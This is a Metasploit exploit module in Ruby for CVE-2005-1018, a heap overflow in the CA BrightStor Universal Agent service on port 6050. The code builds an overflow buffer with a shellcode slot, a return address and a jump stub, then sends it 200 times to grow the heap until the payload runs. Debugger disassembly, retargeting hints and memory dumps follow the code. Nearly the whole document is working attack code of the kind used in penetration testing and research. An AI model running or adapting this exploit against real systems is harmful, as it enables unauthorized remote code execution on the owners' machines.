1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'CA BrightStor Universal Agent Overflow',
16
        'Description' => %q{
17
          This module exploits a convoluted heap overflow in the CA
18
          BrightStor Universal Agent service. Triple userland
19
          exception results in heap growth and execution of
20
          dereferenced function pointer at a specified address.
21
        },
22
        'Author' => [ 'hdm' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2005-1018'],
26
          [ 'OSVDB', '15471' ],
27
          [ 'BID', '13102'],
28
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
29
        ],
30
        'Privileged' => true,
31
        'Payload' => {
32
          # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
33
          'Space' => 164,
34
          'BadChars' => "\x00",
35
          'StackAdjustment' => -3500
36
        },
37
        'Targets' => [
38
          [
39
            'Magic Heap Target #1',
40
            {
41
              'Platform' => 'win',
42
              'Ret' => 0x01625c44 # We grow to our own return address
43
            },
44
          ],
45
        ],
46
        'DisclosureDate' => '2005-04-11',
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Reliability' => UNKNOWN_RELIABILITY,
50
          'Stability' => UNKNOWN_STABILITY,
51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
        }
53
      )
54
    )
55

56
    register_options(
57
      [
58
        Opt::RPORT(6050)
59
      ]
60
    )
61
  end
62

63
  def exploit
64
    print_status("Trying target #{target.name}...")
65

66
    # The server reverses four bytes starting at offset 0xa5 :0
67

68
    # Create the overflow string
69
    boom = 'X' * 1024
70

71
    # Required field to trigger the fault
72
    boom[248, 2] = [1000].pack('V')
73

74
    # The shellcode, limited to 250 bytes (no nulls)
75
    boom[256, payload.encoded.length] = payload.encoded
76

77
    # This should point to itself
78
    boom[576, 4] = [target.ret].pack('V')
79

80
    # This points to the code below
81
    boom[580, 4] = [target.ret + 8].pack('V')
82

83
    # We have 95 bytes, use it to hop back to shellcode
84
    boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"
85

86
    # Stick the protocol header in front of our request
87
    req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom
88

89
    # We keep making new connections and triggering the fault until
90
    # the heap is grown to encompass our known return address. Once
91
    # this address has been allocated and filled, each subsequent
92
    # request will result in our shellcode being executed.
93

94
    1.upto(200) do |i|
95
      connect
96
      print_status("Sending request #{i} of 200...") if (i % 10) == 0
97
      sock.put(req)
98
      disconnect
99

100
      # Give the process time to recover from each exception
101
      select(nil, nil, nil, 0.1)
102
    end
103

104
    handler
105
  end
106
end
107

108

109
__END__
110
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
111
012a0d97 83c404           add     esp,0x4
112
012a0d9a 85c9             test    ecx,ecx
113
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
114
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
115
012a0da0 6a01             push    0x1
116
012a0da2 ff5204           call    dword ptr [edx+0x4]
117

118
Each request will result in another chunk being allocated, the exception
119
causes these chunks to never be freed. The large chunk size allows us to
120
predict the location of our buffer and grow our buffer to where we need it.
121

122
If these addresses do not match up, run this exploit, then attach with WinDbg:
123

124
> s 0 Lfffffff 0x44 0x5c 0x61 0x01
125

126
Figure out the pattern, replace the return address, restart the service,
127
and run it through again. Only tested on WinXP SP1
128

129
011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
130
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
131
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
132
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
133
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
134
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
135
[ snip ]
136
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
137
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
138
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
139
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
140
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
141
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
142
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
143
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
144
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
145
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
146
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
147
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
148
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
149
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
150
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
151
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
152

153